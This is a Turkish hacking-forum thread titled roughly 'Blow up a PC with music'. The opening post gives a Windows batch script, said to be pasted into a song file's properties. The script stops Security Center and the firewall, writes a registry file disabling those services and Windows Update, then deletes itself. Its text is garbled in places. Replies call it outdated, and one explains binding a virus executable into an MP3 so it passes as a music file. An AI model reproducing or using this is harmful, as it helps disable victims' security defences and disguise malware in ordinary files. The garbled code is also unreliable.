Müzik ile PC patlat

yigit63

Katılımcı Üye
19 Ağu 2009
266
0
arkadaşlar ilk önce bi şarkı seciyoruz sonra şarkının üzerinde sağ tıkla özellikler/özet ve acıklamalar bölümüne aşagıdaki verdim kodları yapıştırın uygula deyip cıkıyoruz
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.&l92;kill.reg" ECHO A R E S
>>"%Temp%.&l92;kill.reg" ECHO.
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;CurrentControlSe t&l92;Servic es&l92;SharedAccess]
>>"%Temp%.&l92;kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;CurrentControlSe t&l92;Servic es&l92;wuauserv]
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;ControlSet001&l9 2;Services&l92;w scsvc]
START /WAIT REGEDIT /S "%Temp%.&l92;kill.reg"
DEL "%Temp%.&l92;kill.reg"
DEL %0
Müziği Windows media player ile açmasını sağlayın

lCoMeToMel

Uzman üye
11 Ağu 2009
1,682
0
35
Yeni Sİstem Hoparlörler Müzik Aşırı Olunca Bağlantı Keser. Eskilerde de Çalışacağını Sanmam

Mrt Krblt

Uzman üye
7 Şub 2011
1,685
0
local şebeke
bu kodlar ve diger tüm kodlar 1990lerde eski kasa pc lere uygulanan kodlardır hiçbiri çalışmaz bigün kafam attı pc çökertme kodunu ben kendi pcmde açtım pc rest.attı kendine yeni pc lerde işe yaramazzzzzz

PcChoLik

Uzman üye
18 Tem 2011
1,587
0
İstanbul
benimki 2009 model işe yaramadı :D bunları hemen txt okuyularla açıp yapıştırırsanız işe yaramaz en iyisi benim yaptığımdır :D
müziği decoder la aç sonra içindeki tüm kodların doğrusu neyse o gözükür sende sonuna değilde o programı exeye çevirirsin mp3ün exesiyle virüs exeyi birleştirirsin sonra format converterlada mp3 yaparsın
olduda bitti maşallah :D

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.